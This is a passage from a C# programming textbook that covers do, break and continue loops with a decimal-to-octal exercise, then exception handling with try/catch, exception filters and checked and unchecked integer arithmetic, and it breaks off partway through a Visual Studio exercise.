part of a for statement. That variable is scoped to the body of the for
statement and disappears when the for statement finishes. This rule has two
important consequences. First, you cannot use that variable after the for
statement has ended because it’s no longer in scope. Here’s an example:
for (int i = 0; i < 10; i++)
{
...
}
Console.WriteLine(i); // compile-time error
Second, you can write two or more for statements that reuse the same
variable name because each variable is in a different scope, as shown in the
following code:
for (int i = 0; i < 10; i++)
{
...
}
for (int i = 0; i < 20; i += 2) // okay
{
...
}
Writing do statements
Both the while and for statements test their Boolean expression at the
beginning of the loop. This means that if the expression evaluates to false on
the first test, the body of the loop does not run—not even once. The do
statement is different: its Boolean expression is evaluated after each iteration,
so the body always executes at least once.
The syntax of the do statement is as follows (don’t forget the final
semicolon):
do
statement
while (booleanExpression);
You must use a statement block if the body of the loop contains more than
one statement (the compiler will report a syntax error if you don’t). Here’s a
version of the example that writes the values 0 through 9 to the console, this
time constructed by using a do statement:
int i = 0;
do
{
Console.WriteLine(i);
i++;
}
while (i < 10);
The break and continue statements
In Chapter 4, you saw how to use the break statement to jump out of a
switch statement. You can also use a break statement to jump out of the
body of an iteration statement. When you break out of a loop, the loop
exits immediately, and execution continues at the first statement that
follows the loop. Neither the update nor the continuation condition of
the loop is rerun.
In contrast, the continue statement causes the program to perform the
next iteration of the loop immediately (after reevaluating the Boolean
expression). Here’s another version of the example that writes the
values 0 through 9 to the console, this time using break and continue
statements:
int i = 0;
while (true)
{
Console.WriteLine(i);
i++;
if (i < 10)
continue;
else
break;
}
This code is absolutely ghastly. Many programming guidelines
recommend using continue cautiously or not at all because it is often
associated with hard-to-understand code. The behavior of continue is
also quite subtle. For example, if you execute a continue statement from
within a for statement, the update part runs before performing the next
iteration of the loop.
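You can observe that subtlety directly. In the following sketch, the continue statement skips the rest of the loop body, but the i++ update part of the for statement still runs, so the loop terminates normally:
for (int i = 0; i < 10; i++)
{
    if (i % 2 != 0)
    {
        continue; // skip odd values; i++ still runs before the next test
    }
    Console.WriteLine(i); // writes 0, 2, 4, 6, and 8
}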
In the following exercise, you will write a do statement to convert a
positive decimal whole number to its string representation in octal notation.
The program is based on the following algorithm, which implements a well-known mathematical procedure:
store the decimal number in the variable dec
do the following
divide dec by 8 and store the remainder
set dec to the quotient from the previous step
while dec is not equal to zero
combine the values stored for the remainder for each calculation in
reverse order
For example, suppose that you want to convert the decimal number 999 to
octal. You perform the following steps:
1. Divide 999 by 8. The quotient is 124 and the remainder is 7.
2. Divide 124 by 8. The quotient is 15 and the remainder is 4.
3. Divide 15 by 8. The quotient is 1 and the remainder is 7.
4. Divide 1 by 8. The quotient is 0 and the remainder is 1.
5. Combine the values calculated for the remainder at each step in reverse
order. The result is 1747. This is the octal representation of the decimal
value 999.
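You can check these steps with a minimal console sketch of the same algorithm before building the graphical version in the exercise that follows:
int dec = 999;
string octal = "";

do
{
    int remainder = dec % 8;
    octal = remainder + octal; // prepend, so the digits appear in reverse order of calculation
    dec /= 8;                  // the quotient feeds the next iteration
}
while (dec != 0);

Console.WriteLine(octal); // writes 1747 to the console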
Write a do statement
1. Using Visual Studio 2017, open the DoStatement solution, which is
located in the \Microsoft Press\VCSBS\Chapter 5\DoStatement folder in
your Documents folder.
2. Display the MainPage.xaml form in the Design View window.
The form contains a text box called number in which the user can enter a
decimal number. When the user clicks the Show Steps button, the octal
representation of the number entered is generated. The text box to the
right, called steps, shows the results of each stage of the calculation.
3. Display the code for MainPage.xaml.cs in the Code and Text Editor
window and locate the showStepsClick method.
This method runs when the user clicks the Show Steps button on the
form. Currently, it is empty.
4. Add the following statements shown in bold to the showStepsClick
method:
private void showStepsClick(object sender, RoutedEventArgs e)
{
    int amount = int.Parse(number.Text);
    steps.Text = "";
    string current = "";
}
The first statement converts the string value in the Text property of the
number text box into an int by using the Parse method of the int type
and stores it in a local variable called amount.
The second statement clears the text displayed in the lower text box by
setting its Text property to the empty string.
The third statement declares a string variable called current and
initializes it to the empty string. You will use this string to store the
digits generated at each iteration of the loop that is used to convert the
decimal number to its octal representation.
5. Add the following do statement (shown in bold) to the showStepsClick
method:
private void showStepsClick(object sender, RoutedEventArgs e)
{
    int amount = int.Parse(number.Text);
    steps.Text = "";
    string current = "";
    do
    {
        int nextDigit = amount % 8;
        amount /= 8;
        int digitCode = '0' + nextDigit;
        char digit = Convert.ToChar(digitCode);
        current = digit + current;
        steps.Text += current + "\n";
    }
    while (amount != 0);
}
The algorithm used here repeatedly performs integer arithmetic to divide
the amount variable by 8 and determine the remainder. The remainder
after each successive division constitutes the next digit in the string
being built. Eventually, when amount is reduced to 0, the loop finishes.
Notice that the body must run at least once. This behavior is exactly
what is required because even the number 0 has one octal digit.
Look more closely at the code; you will see that the first statement
executed by the do loop is this:
int nextDigit = amount % 8;
This statement declares an int variable called nextDigit and initializes it
to the remainder after dividing the value in amount by 8. This will be a
number somewhere between 0 and 7.
The next statement in the do loop is
amount /= 8;
This is a compound assignment statement and is equivalent to writing
amount = amount / 8;. If the value of amount is 999, the value of
amount after this statement runs is 124.
The next statement is this:
int digitCode = '0' + nextDigit;
This statement requires a little explanation. Characters have a unique
code according to the character set used by the operating system. In the
character sets frequently used by the Windows operating system, the
code for character “0” has integer value 48. The code for character “1” is
49, the code for character “2” is 50, and so on, up to the code for
character “9,” which has integer value 57. With C#, you can treat a
character as an integer and perform arithmetic on it, but when you do so,
C# uses the character's code as the value. So the expression '0' +
nextDigit actually results in a value somewhere between 48 and 55
(remember that nextDigit will be between 0 and 7), corresponding to the
code for the equivalent octal digit.
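You can verify this character arithmetic in isolation with a small fragment such as the following (a sketch that assumes nextDigit is 7, as in the worked example):

int nextDigit = 7;
int digitCode = '0' + nextDigit;   // 48 + 7 = 55
Console.WriteLine(digitCode);      // displays 55, the code for '7'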
The fourth statement in the do loop is
char digit = Convert.ToChar(digitCode);
This statement declares a char variable called digit and initializes it to
the result of the Convert.ToChar(digitCode) method call. The
Convert.ToChar method takes an integer holding a character code and
returns the corresponding character. So, for example, if digitCode has
the value 54, Convert.ToChar(digitCode) returns the character ‘6’.
To summarize, the first four statements in the do loop have determined
the character representing the least-significant (rightmost) octal digit
corresponding to the number the user entered. The next task is to
prepend this digit to the string to be output, like this:
current = digit + current;
The next statement in the do loop is this:
steps.Text += current + "\n";
This statement adds to the steps text box the string containing the digits
produced so far for the octal representation of the number. It also
appends a newline character so that each stage of the conversion appears
on a separate line in the text box.
Finally, the condition in the while clause at the end of the loop is
evaluated:
while (amount != 0);
Because the value of amount is not yet 0, the loop performs another
iteration.
In the final exercise of this chapter, you will use the Visual Studio 2017
debugger to step through the previous do statement to help you understand
how it works.
Step through the do statement
1. In the Code and Text Editor window displaying the MainPage.xaml.cs
file, move the cursor to the first statement of the showStepsClick
method:
int amount = int.Parse(number.Text);
2. Right-click anywhere in the first statement, and then click Run To
Cursor.
3. When the form appears, type 999 in the number text box on the left, and
then click Show Steps.
The program stops, and you are placed in Visual Studio 2017 debug
mode. A yellow arrow in the left margin of the Code and Text Editor
window and yellow highlighting on the code indicates the current
statement.
4. In the window below the Code and Text Editor window, click the Locals
tab, as highlighted in the following image.
The Locals window displays the name, value, and type of the local
variables in the current method, including the amount local variable.
Notice that the value of amount is currently 0.
5. Display the Debug toolbar if it is not visible. (On the View menu, point
to Toolbars, and then click Debug.)
Note The commands on the Debug toolbar are also available on
the Debug menu displayed on the menu bar.
6. On the Debug toolbar, click the Step Into button.
The debugger runs the following statement:
int amount = int.Parse(number.Text);
The value of amount in the Locals window changes to 999, and the
yellow arrow moves to the next statement.
7. Click Step Into again.
The debugger runs this statement:
steps.Text = "";
This statement does not affect the Locals window because steps is a
control on the form and not a local variable. The yellow arrow moves to
the next statement.
8. Click Step Into.
The debugger runs the statement shown here:
string current = "";
The yellow arrow moves to the opening brace at the start of the do loop.
The do loop contains three local variables of its own: nextDigit,
digitCode, and digit. Notice that these local variables now appear in the
Locals window. The value of all three variables is initially set to 0.
9. Click Step Into.
The yellow arrow moves to the first statement within the do loop.
10. Click Step Into.
The debugger runs the following statement:
int nextDigit = amount % 8;
The value of nextDigit in the Locals window changes to 7. This is the
remainder after dividing 999 by 8.
11. Click Step Into.
The debugger runs this statement:
amount /= 8;
The value of amount changes to 124 in the Locals window.
12. Click Step Into.
The debugger runs this statement:
int digitCode = '0' + nextDigit;
The value of digitCode in the Locals window changes to 55. This is the
character code of the character “7” (48 + 7).
13. Click Step Into.
The debugger continues to this statement:
char digit = Convert.ToChar(digitCode);
The value of digit changes to “7” in the Locals window. The Locals
window shows char values using both the underlying numeric value (in
this case, 55) and also the character representation (“7”).
Note that in the Locals window, the value of the current variable is still
“”.
14. Click Step Into.
The debugger runs the following statement:
current = digit + current;
The value of current changes to “7” in the Locals window.
15. Click Step Into.
The debugger runs the statement shown here:
steps.Text += current + "\n";
This statement displays the text “7” in the steps text box, followed by a
newline character to cause subsequent output to be displayed on the next
line in the text box. (The form is currently hidden behind Visual Studio,
so you won’t be able to see it.) The cursor moves to the closing brace at
the end of the do loop.
16. Click Step Into.
The yellow arrow moves to the while statement to evaluate whether the
do loop has completed or whether it should continue for another
iteration.
17. Click Step Into.
The debugger runs this statement:
while (amount != 0);
The value of amount is 124, so the expression 124 != 0 evaluates to
true, and the do loop performs another iteration. The yellow arrow jumps back
to the opening brace at the start of the do loop.
18. Click Step Into.
The yellow arrow moves to the first statement within the do loop again.
19. Repeatedly click Step Into to step through the next three iterations of the
do loop and watch how the values of the variables change in the Locals
window.
20. At the end of the fourth iteration of the loop, the value of amount is 0
and the value of current is “1747”. The yellow arrow is on the while
condition at the end of the do loop:
while (amount != 0);
Because the value of amount is now 0, the expression amount != 0
evaluates to false, and the do loop should terminate.
21. Click Step Into.
The debugger runs the following statement:
while (amount != 0);
As predicted, the do loop finishes, and the yellow arrow moves to the
closing brace at the end of the showStepsClick method.
22. On the Debug menu, click Continue.
The form appears, displaying the four steps used to create the octal
representation of 999: 7, 47, 747, and 1747.
23. Return to Visual Studio 2017. On the Debug menu, click Stop
Debugging.
Summary
In this chapter, you learned how to use the compound assignment operators to
update numeric variables and append one string to another. You saw how to
use while, for, and do statements to execute code repeatedly while some
Boolean condition is true.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 6, “Managing errors and exceptions.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference

To: Add an amount to a variable
Do this: Use the compound addition operator. For example:

variable += amount;

To: Subtract an amount from a variable
Do this: Use the compound subtraction operator. For example:

variable -= amount;

To: Run one or more statements zero or more times while a condition is true
Do this: Use a while statement. For example:

int i = 0;
while (i < 10)
{
    Console.WriteLine(i);
    i++;
}

Alternatively, use a for statement. For example:

for (int i = 0; i < 10; i++)
{
    Console.WriteLine(i);
}

To: Repeatedly execute statements one or more times
Do this: Use a do statement. For example:

int i = 0;
do
{
    Console.WriteLine(i);
    i++;
}
while (i < 10);
CHAPTER 6
Managing errors and exceptions
After completing this chapter, you will be able to:
Handle exceptions by using the try, catch, and finally statements.
Control integer overflow by using the checked and unchecked
keywords.
Raise exceptions from your own methods by using the throw keyword.
Ensure that code always runs, even after an exception has occurred, by
using a finally block.
You have now seen the core C# statements that you need to know to
perform common tasks such as writing methods, declaring variables, using
operators to create values, writing if and switch statements to run code
selectively, and writing while, for, and do statements to run code repeatedly.
However, the previous chapters haven’t considered the possibility (or
probability) that things can go wrong.
It is very difficult to ensure that a piece of code always works as expected.
Failures can occur for a large number of reasons, many of which are beyond
your control as a programmer. Any applications that you write must be
capable of detecting failures and gracefully handling them, either by taking
the appropriate corrective actions or, if that is not possible, by reporting the
reasons for the failure in the clearest possible way to the user. In this final
chapter of Part I, you’ll learn how C# uses exceptions to signal that an error
has occurred and how to use the try, catch, and finally statements to catch and
handle the errors that these exceptions represent.
By the end of this chapter, you’ll have a solid foundation in all the
fundamental elements of C#, and you will build on this foundation in Part II.
Coping with errors
It’s a fact of life that bad things sometimes happen. Tires are punctured,
batteries run down, screwdrivers are never where you left them, and users of
your applications behave in unpredictable ways. In the world of computers,
hard disks become corrupt, other applications running on the same computer
as your program run amok and use up all the available memory, wireless
network connections disappear at the most awkward moment, and even
natural phenomena such as a nearby lightning strike can have an impact if it
causes a power outage or network failure. Errors can occur at almost any
stage when a program runs, and many errors might not actually be the fault of
your own application, so how do you detect them and attempt to recover?
Over the years, a number of mechanisms have evolved. A typical
approach adopted by older systems such as UNIX involved arranging for the
operating system to set a special global variable whenever a method failed.
Then, after each call to a method, you checked the global variable to see
whether the method succeeded. C# and most other modern object-oriented
languages don’t handle errors in this manner; it’s just too painful. Instead,
they use exceptions. If you want to write robust C# programs, you need to
know about exceptions.
Trying code and catching exceptions
Errors can happen at any time, and using traditional techniques to manually
add error-detecting code around every statement is cumbersome, time-
consuming, and error-prone in its own right. You can also lose sight of the
main flow of an application if each statement requires contorted error-
handling logic to manage each possible error that can occur at every stage.
Fortunately, C# makes it easy to separate the error-handling code from the
code that implements the primary logic of a program by using exceptions and
exception handlers. To write exception-aware programs, you need to do two
things:
Write your code within a try block (try is a C# keyword). When the
code runs, it attempts to execute all the statements in the try block, and
if none of the statements generates an exception, they all run, one after
the other, to completion. However, if an error condition occurs,
execution jumps out of the try block and into another piece of code
designed to catch and handle the exception—a catch handler.
Write one or more catch handlers (catch is another C# keyword)
immediately after the try block to handle any possible error conditions.
A catch handler is intended to capture and handle a specific type of
exception, and you can have multiple catch handlers after a try block,
each one designed to trap and process a specific exception. This
enables you to provide different handlers for the different errors that
could arise in the try block. If any one of the statements within the try
block causes an error, the runtime throws an exception. The runtime
then examines the catch handlers after the try block and transfers
control directly to the first matching handler.
Here’s an example of a try block that contains code that attempts to
convert strings that a user has typed in some text boxes on a form to integer
values. The code then calls a method to calculate a value and writes the result
to another text box. Converting a string to an integer requires that the string
contain a valid set of digits and not some arbitrary sequence of characters. If
the string contains invalid characters, the int.Parse method throws a
FormatException and execution transfers to the corresponding catch handler.
When the catch handler finishes, the program continues with the first
statement that follows the handler. Note that if no handler corresponds to the
exception, the exception is said to be unhandled (this situation will be
described shortly).
try
{
    int leftHandSide = int.Parse(lhsOperand.Text);
    int rightHandSide = int.Parse(rhsOperand.Text);
    int answer = doCalculation(leftHandSide, rightHandSide);
    result.Text = answer.ToString();
}
catch (FormatException fEx)
{
    // Handle the exception
    ...
}
A catch handler employs syntax similar to that used by a method
parameter to specify the exception to be caught. In the preceding example,
when a FormatException is thrown, the fEx variable is populated with an
object containing the details of the exception.
The FormatException type has a number of properties that you can
examine to determine the exact cause of the exception. Many of these
properties are common to all exceptions. For example, the Message property
contains a text description of the error that caused the exception. You can use
this information when handling the exception, perhaps recording the details
in a log file or displaying a meaningful message to the user and then asking
the user to try again.
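For example, a handler might simply display the Message text, as in this minimal console sketch (the input string is deliberately invalid so that int.Parse throws):

try
{
    int value = int.Parse("not a number"); // throws FormatException
}
catch (FormatException fEx)
{
    // Message contains the textual description of the error
    Console.WriteLine("Could not parse input: " + fEx.Message);
}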
Unhandled exceptions
What happens if a try block throws an exception and there is no
corresponding catch handler? In the previous example, it is possible that the
lhsOperand text box could contain the string representation of a valid integer
but the integer it represents is outside the range of valid integers supported by
C# (for example, “2147483648”). In this case, the int.Parse statement would
throw an OverflowException, which will not be caught by the
FormatException catch handler. If this occurs and the try block is part of a
method, the method immediately exits and execution returns to the calling
method. If the calling method uses a try block, the runtime attempts to locate
and execute a matching catch handler for this try block. If the calling method
does not use a try block or if there is no matching catch handler, the calling
method immediately exits, and execution returns to its caller, where the
process is repeated. If a matching catch handler is eventually found, the
handler runs and execution continues with the first statement that follows the
catch handler in the catching method.
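The following console sketch illustrates this propagation (the method names parseInput and run are illustrative, not part of the MathsOperators application). The parseInput method contains no try block, so the exception thrown inside it is handled by its caller:

static int parseInput(string text)
{
    // Any FormatException thrown here propagates back to the caller
    return int.Parse(text);
}

static void run()
{
    try
    {
        int value = parseInput("twelve");
    }
    catch (FormatException fEx)
    {
        // Execution resumes here, in the catching method, not in parseInput
        Console.WriteLine(fEx.Message);
    }
}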
Important Notice that after catching an exception, execution continues
in the method containing the catch block that caught the exception. If
the exception occurred in a method other than the one containing the
catch handler, control does not return to the method that caused the
exception.
If, after cascading back through the list of calling methods, the runtime is
unable to find a matching catch handler, the program will terminate with an
unhandled exception.
You can easily examine exceptions generated by your application. If you
are running the application in Microsoft Visual Studio 2017 in debug mode
(that is, on the Debug menu you selected Start Debugging to run the
application) and an exception occurs, a dialog box similar to the one shown
in the following image appears and the application pauses, helping you to
determine the cause of the exception:
The application stops at the statement that caused the exception and drops
you into the debugger. There you can examine the values of variables, you
can change the values of variables, and you can step through your code from
the point at which the exception occurred by using the Debug toolbar and the
various debug windows.
Using multiple catch handlers
The previous discussion highlighted how different errors throw different
kinds of exceptions to represent different kinds of failures. To cope with
these situations, you can supply multiple catch handlers, one after the other,
such as in the following:
try
{
    int leftHandSide = int.Parse(lhsOperand.Text);
    int rightHandSide = int.Parse(rhsOperand.Text);
    int answer = doCalculation(leftHandSide, rightHandSide);
    result.Text = answer.ToString();
}
catch (FormatException fEx)
{
    //...
}
catch (OverflowException oEx)
{
    //...
}
If the code in the try block throws a FormatException exception, the
statements in the catch block for the FormatException exception run. If the
code throws an OverflowException exception, the catch block for the
OverflowException exception runs.
Note If the code in the FormatException catch block generates an
OverflowException exception, it does not cause the adjacent
OverflowException catch block to run. Instead, the exception
propagates to the method that invoked this code, as described earlier in
this section.
Catching multiple exceptions
The exception-catching mechanism provided by C# and the Microsoft .NET
Framework is quite comprehensive. The .NET Framework defines many
types of exceptions, and any programs you write can throw most of them. It
is highly unlikely that you will want to write catch handlers for every
possible exception that your code can throw—remember that your application
must be able to handle exceptions that you never even considered when you
wrote it! So, how do you ensure that your programs catch and handle all
possible exceptions?
The answer to this question lies in the way the different exceptions are
related to one another. Exceptions are organized into families called
inheritance hierarchies. (You will learn about inheritance in Chapter 12,
“Working with inheritance.”) FormatException and OverflowException both
belong to a family called SystemException, as do a number of other
exceptions. SystemException is itself a member of a wider family simply
called Exception, and this is the great-granddaddy of all exceptions. If you
catch Exception, the handler traps every possible exception that can occur.
Note The Exception family includes a wide variety of exceptions, many
of which are intended for use by various parts of the .NET Framework.
Some of these exceptions are somewhat esoteric, but it is still useful to
understand how to catch them.
The next example shows how to catch all possible exceptions:
try
{
    int leftHandSide = int.Parse(lhsOperand.Text);
    int rightHandSide = int.Parse(rhsOperand.Text);
    int answer = doCalculation(leftHandSide, rightHandSide);
    result.Text = answer.ToString();
}
catch (Exception ex) // this is a general catch handler
{
    //...
}
Note If you want to catch Exception, you can actually omit its name
from the catch handler because it is the default exception:
catch
{
    // ...
}
However, this is not recommended. The exception object passed to
the catch handler can contain useful information concerning the
exception, which is not easily accessible when using this version of the
catch construct.
There is one final question you should be asking at this point: What
happens if the same exception matches multiple catch handlers at the end of a
try block? If you catch FormatException and Exception in two different
handlers, which one will run? (Or will both execute?)
When an exception occurs, the runtime uses the first handler it finds that
matches the exception and the others are ignored. This means that if you
place a handler for Exception before a handler for FormatException, the
FormatException handler will never run. Therefore, you should place more
specific catch handlers above a general catch handler after a try block. If
none of the specific catch handlers matches the exception, the general catch
handler will.
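For example, in the following sketch the FormatException handler appears before the general Exception handler; placing them in the opposite order would make the FormatException handler unreachable:

string input = "?";
try
{
    int value = int.Parse(input);
}
catch (FormatException fEx) // specific handler: place it first
{
    Console.WriteLine("Format problem: " + fEx.Message);
}
catch (Exception ex) // general handler: place it last
{
    Console.WriteLine("Some other problem: " + ex.Message);
}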
Filtering exceptions
You can filter the exceptions that are matched against catch handlers, to
ensure that the exception handler is triggered only when additional conditions
are met. These conditions take the form of a Boolean expression prefixed by
the when keyword. The following example illustrates the syntax:
bool catchErrors = ...;
try
{
    ...
}
catch (Exception ex) when (catchErrors == true)
{
    // Only handle exceptions if the catchErrors variable is true
}
This example catches all exceptions (the Exception type) depending on the
value of the catchErrors Boolean variable; if this variable is false, then no
exception handling occurs, and the default exception-handling mechanism for
the application is used. If catchErrors is true, then the code in the catch block
runs to handle the exception.
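Filters can also distinguish between two handlers for the same exception type. A minimal sketch, assuming a string variable named input that holds the user's text:

string input = "";
try
{
    int value = int.Parse(input);
}
catch (FormatException) when (input.Length == 0)
{
    Console.WriteLine("No input was provided");
}
catch (FormatException fEx)
{
    Console.WriteLine("Invalid number: " + fEx.Message);
}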
In the following exercises, you will see what happens when an application
throws an unhandled exception, and then you will write a try block to catch
and handle an exception.
Observe how the application reports unhandled exceptions
1. Start Visual Studio 2017, if it is not already running.
2. Open the MathsOperators solution, which is located in the \Microsoft
Press\VCSBS\Chapter 6\MathsOperators folder in your Documents
folder.
This is a version of the program from Chapter 2, “Working with
variables, operators, and expressions,” that demonstrates the different
arithmetic operators.
3. On the Debug menu, click Start Without Debugging.
Note For this exercise, ensure that you actually run the application
without debugging.
The form appears. You are now going to enter some text in the Left
Operand box that will cause an exception. This operation will
demonstrate the lack of robustness in the current version of the program.
4. In the Left Operand box, type John, and in the Right Operand box, type
2. Click the + Addition button, and then click Calculate.
This input triggers Windows default exception handling: the application
simply terminates, and you are returned to the desktop!
Now that you have seen how the application behaves when an unhandled
exception occurs, the next step is to make the application more robust by
handling invalid input and preventing unhandled exceptions from arising.
Write a try/catch statement block
1. Return to Visual Studio 2017.
2. On the Debug menu, click Start Debugging.
3. When the form appears, in the Left Operand box, type John, and in the
Right Operand box, type 2. Click the + Addition button, and then click
Calculate.
This input should cause the same exception that occurred in the previous
exercise, except that now you are running in debug mode, so Visual
Studio traps the exception and reports it.
Visual Studio displays your code and highlights the statement that
caused the exception. It also displays a dialog box that describes the
exception, which in this case is “Input string was not in a correct
format.”
You can see that a FormatException was thrown by the call to int.Parse
inside the addValues method. The problem is that this method is unable
to parse the text “John” into a valid number.
4. In the exception dialog box, click View Details.
The QuickWatch dialog box opens in which you can view more details
about the exception. If you expand the exception, you can see this
information:
Tip Some exceptions are the result of other exceptions raised
earlier. The exception reported by Visual Studio is just the final
exception in this chain, but it is usually the earlier exceptions that
highlight the real cause of the problem. You can drill into these
earlier exceptions by expanding the InnerException property in the
View Details dialog box. Inner exceptions might have further inner
exceptions, and you can keep digging down until you find an
exception with the InnerException property set to null (as shown in
the previous image). At this point, you have reached the initial
exception, and this exception typically highlights the problem that
you need to address.
5. Click Close in the QuickWatch dialog box, and then, in Visual Studio,
on the Debug menu, click Stop Debugging.
6. Display the code for the file MainPage.xaml.cs in the Code and Text
Editor window, and locate the addValues method.
7. Add a try block (including braces) around the statements inside this
method, together with a catch handler for the FormatException
exception, as shown in bold here:
try
{
    int lhs = int.Parse(lhsOperand.Text);
    int rhs = int.Parse(rhsOperand.Text);
    int outcome = 0;
    outcome = lhs + rhs;
    expression.Text = $"{lhsOperand.Text} + {rhsOperand.Text}";
    result.Text = outcome.ToString();
}
catch (FormatException fEx)
{
    result.Text = fEx.Message;
}
Now, if a FormatException exception occurs, the catch handler displays
the text held in the exception’s Message property in the result text box at
the bottom of the form.
8. On the Debug menu, click Start Debugging.
9. When the form appears, in the Left Operand box, type John, and in the
Right Operand box type 2. Click the + Addition button, and then click
Calculate.
The catch handler successfully catches the FormatException, and the
message “Input string was not in a correct format” is written to the
Result text box. The application is now a bit more robust.
10. Replace John with the number 10. In the Right Operand box, type
Sharp, and then click Calculate.
The try block surrounds the statements that parse both text boxes, so the
same exception handler handles user input errors in both text boxes.
11. In the Right Operand box, replace Sharp with 20, click the + Addition
button, and then click Calculate.
The application now works as expected and displays the value 30 in the
Result box.
12. In the Left Operand box, replace 10 with John, click the – Subtraction
button, and then click Calculate.
Visual Studio drops into the debugger and reports a FormatException
exception again. This time, the error has occurred in the subtractValues
method, which does not include the necessary try/catch processing. You
will fix this problem shortly.
13. On the Debug menu, click Stop Debugging.
Propagating exceptions
Adding a try/catch block to the addValues method has made that method
more robust, but you need to apply the same exception handling to the other
methods: subtractValues, multiplyValues, divideValues, and
remainderValues. The code for each of these exception handlers will likely
be very similar, resulting in you writing the same code in each method. Each
of these methods is called by the calculateClick method when the user clicks
the Calculate button. Therefore, to avoid duplication of the exception-
handling code, it makes sense to relocate it to the calculateClick method. If a
FormatException occurs in the subtractValues, multiplyValues, divideValues,
or remainderValues method, it will be propagated back to the calculateClick
method for handling as described in the section “Unhandled exceptions”
earlier in this chapter.
Propagate an exception back to the calling method
1. Display the code for the file MainPage.xaml.cs in the Code and Text
Editor window, and locate the addValues method.
2. Remove the try block and catch handler from the addValues method and
return it to its original state, as shown in the following code:
private void addValues()
{
    int lhs = int.Parse(lhsOperand.Text);
    int rhs = int.Parse(rhsOperand.Text);
    int outcome = 0;
    outcome = lhs + rhs;
    expression.Text = lhsOperand.Text + " + " + rhsOperand.Text;
    result.Text = outcome.ToString();
}
3. Find the calculateClick method. Add to this method the try block and
catch handler shown in bold in the following example:
private void calculateClick(object sender, RoutedEventArgs e)
{
    try
    {
        if ((bool)addition.IsChecked)
        {
            addValues();
        }
        else if ((bool)subtraction.IsChecked)
        {
            subtractValues();
        }
        else if ((bool)multiplication.IsChecked)
        {
            multiplyValues();
        }
        else if ((bool)division.IsChecked)
        {
            divideValues();
        }
        else if ((bool)remainder.IsChecked)
        {
            remainderValues();
        }
    }
    catch (FormatException fEx)
    {
        result.Text = fEx.Message;
    }
}
4. On the Debug menu, click Start Debugging.
5. When the form appears, in the Left Operand box, type John, and in the
Right Operand box, type 2. Click the + Addition button, and then click
Calculate.
As before, the catch handler successfully catches the FormatException,
and the message “Input string was not in a correct format” is written to
the Result text box. However, bear in mind that the exception was
actually thrown in the addValues method, but the handler caught it in the
calculateClick method.
6. Click the – Subtraction button, and then click Calculate.
This time, the subtractValues method causes the exception, but it is
propagated back to the calculateClick method and handled in the same
manner as before.
7. Test the * Multiplication, / Division, and % Remainder buttons, and
verify that the FormatException exception is caught and handled
correctly.
8. Return to Visual Studio and stop debugging.
Note The decision whether to catch unhandled exceptions explicitly in a
method depends on the nature of the application you are building. In
some cases, it makes sense to catch exceptions as close as possible to
the point at which they occur. In other situations, it is more useful to let
an exception propagate back to the method that invoked the routine that
threw the exception and handle the error there.
Using checked and unchecked integer arithmetic
Chapter 2 discusses how to use binary arithmetic operators such as + and *
on primitive data types such as int and double. You should also recall that the
primitive data types have a fixed size. For example, a C# int is 32 bits.
Because int has a fixed size, you know exactly the range of values that it can
hold: it is –2147483648 to 2147483647.
Tip If you want to refer to the minimum or maximum value of int in
code, you can use the int.MinValue or int.MaxValue properties.
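For example:

Console.WriteLine(int.MinValue); // displays -2147483648
Console.WriteLine(int.MaxValue); // displays 2147483647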
The fixed size of the int type creates a problem. For example, what
happens if you add 1 to an int whose value is currently 2147483647? The
answer is that it depends on how the application is compiled. By default, the
C# compiler generates code that allows the calculation to overflow silently
and you get the wrong answer. (In fact, the calculation wraps around to the
most negative integer value, and the result generated is –2147483648.) The
reason for this behavior is performance: integer arithmetic is a common
operation in almost every program, and adding the overhead of overflow
checking to each integer expression could lead to very poor performance. In
many cases, the risk is acceptable because you know (or hope!) that your int
values won’t reach their limits. If you don’t like this approach, you can turn
on overflow checking.
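You can observe the default wraparound behavior with a fragment such as this (a sketch that assumes the default compiler settings, with overflow checking turned off):

int number = int.MaxValue;
number++;                  // overflows silently
Console.WriteLine(number); // displays -2147483648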
Tip You can turn overflow checking on and off in Visual Studio 2017
by setting the project properties. In Solution Explorer, click YourProject
(where YourProject is the actual name of the project). On the Project
menu, click YourProject Properties. In the project properties dialog box,
click the Build tab. Click the Advanced button in the lower-right corner
of the page. In the Advanced Build Settings dialog box, select or clear
the Check For Arithmetic Overflow/Underflow check box.
Regardless of how you compile an application, you can use the checked
and unchecked keywords to turn on and off integer arithmetic overflow
checking in parts of an application that you think need it. These keywords
override the compiler option specified for the project.
Writing checked statements
A checked statement is a block preceded by the checked keyword. Integer
arithmetic in a checked statement throws an OverflowException if any
calculation in the block overflows, as shown in this example:
int number = int.MaxValue;
checked
{
    int willThrow = number++;
    Console.WriteLine("this won't be reached");
}
Important Only integer arithmetic directly inside the checked block is
subject to overflow checking. For example, if one of the checked
statements is a method call, checking does not apply to code that runs in
the method that is called.
You can also use the unchecked keyword to create an unchecked block
statement. All integer arithmetic in an unchecked block is not checked and
never throws an OverflowException. For example:
int number = int.MaxValue;
unchecked
{
    int wontThrow = number++;
    Console.WriteLine("this will be reached");
}
Writing checked expressions
You can also use the checked and unchecked keywords to control overflow
checking on integer expressions by preceding just the individual
parenthesized expression with the checked or unchecked keyword, as shown
in these examples:
int number = int.MaxValue;
int wontThrow = unchecked(number + 1); // wraps around silently
int willThrow = checked(number + 1);   // throws OverflowException
The compound operators (such as += and –=) and the increment (++) and
decrement (--) operators are arithmetic operators and can be controlled by
using the checked and unchecked keywords. Remember, x += y is the same as
x = x + y.
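For example, the following sketch shows the increment and compound assignment operators obeying an enclosing unchecked or checked block:

int number = int.MaxValue;
unchecked
{
    number++;    // wraps to int.MinValue without throwing
}

number = int.MaxValue;
checked
{
    number += 1; // throws OverflowException
}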
Important You cannot use the checked and unchecked keywords to
control floating-point (noninteger) arithmetic. The checked and
unchecked keywords apply only to integer arithmetic using data types
such as int and long. Floating-point arithmetic never throws
OverflowException—not even when you divide by 0.0. (Remember
from Chapter 2 that the .NET Framework has a special floating-point
representation for infinity.)
In the following exercise, you will see how to perform checked arithmetic
when using Visual Studio 2017.
Use checked expressions
1. Return to Visual Studio 2017.
2. On the Debug menu, click Start Debugging.
You will now attempt to multiply two large values.
3. In the Left Operand box, type 9876543. In the Right Operand box, type
9876543. Click the * Multiplication button, and then click Calculate.
The value –1195595903 appears in the Result box on the form. This is a
negative value, which cannot possibly be correct. This value is the result
of a multiplication operation that silently overflowed the 32-bit limit of
the int type.
4. Return to Visual Studio and stop debugging.
5. In the Code and Text Editor window displaying MainPage.xaml.cs,
locate the multiplyValues method, which should look like this:
